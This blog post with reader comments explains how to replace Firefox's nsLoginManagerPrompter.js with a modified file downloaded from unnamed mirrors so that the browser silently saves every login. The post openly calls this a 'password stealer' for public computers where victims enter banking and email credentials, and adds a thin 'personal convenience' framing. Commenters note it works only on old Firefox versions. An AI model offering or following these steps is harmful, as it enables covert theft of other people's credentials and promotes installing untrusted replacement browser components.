The login details used on firefox made to be auto saved can be used for phishing purposes easily so beware while logging to sites via firefox when it is done in public computers as one can easily loose their login details be it of online banking, emails or any other stuff which in other words ones loss can be to any extent depending on the sites login details the person lost.
This method can also be used for personal benifits like one getting the login details saved automatically in the browser without getting asked everytime to save it. This can be pretty handy for people who use huge amount of different login details on their secured personal system/laptop.
just follow the below steps for this hack to work so that firefox starts saving login details used through it automatically and in other words which make it password stealer.
- Locate the file named nsLoginManagerPrompter.js in the installed location of the firefox. ex : C:\Program Files\Mozilla Firefox\components
- Download this file (mirror1 or mirror2) and extract the rar archive and then replace the extracted file with this file nsLoginManagerPrompter.js which is present in installed firefox location.
- This will start saving the passwords automatically in firefox.
5 comments: on "Autosave passwords in firefox"
What Version of Firefoy did you use?
The bug for the latest firefox verisons looks to be fixed by now and it works for firefox version 3.6 and below which means not a usefull stuff for now and thanks for notifying.
It works !
But I just want to have an alert box asking me to save, even if Firefox doesn't do so... Someone can help me for this ? thx :a
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